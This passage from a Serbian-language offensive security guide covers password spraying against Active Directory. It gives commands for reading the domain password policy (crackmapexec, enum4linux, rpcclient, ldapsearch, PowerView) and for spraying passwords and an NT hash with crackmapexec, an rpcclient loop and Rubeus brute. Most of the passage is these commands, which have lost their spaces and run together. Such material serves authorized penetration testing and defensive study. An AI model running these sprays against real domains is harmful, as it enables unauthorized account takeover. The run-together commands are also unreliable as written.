Kada pronađete nekoliko validnih korisničkih imena možete probati najčešće lozinke (imajte na umu politiku lozinke okruženja) sa svakim otkrivenim korisnikom.
Podrazumevano, minimalna dužina lozinke je 7.
Imajte na umu da možete blokirati neke naloge ako pokušate više pogrešnih lozinki (podrazumevano više od 10).
Dobijanje politike lozinke
Ako imate neke korisničke podatke ili shell kao korisnik domena možete dobiti politiku lozinke sa:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Eksploatacija sa Linuxa (ili sa svih)
Korišćenje crackmapexec:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Sa Invoke-DomainPasswordSpray (Može generisati korisnike iz domena po podrazumevanim vrednostima i dobiće pravila za lozinke iz domena i ograničiti pokušaje prema njima):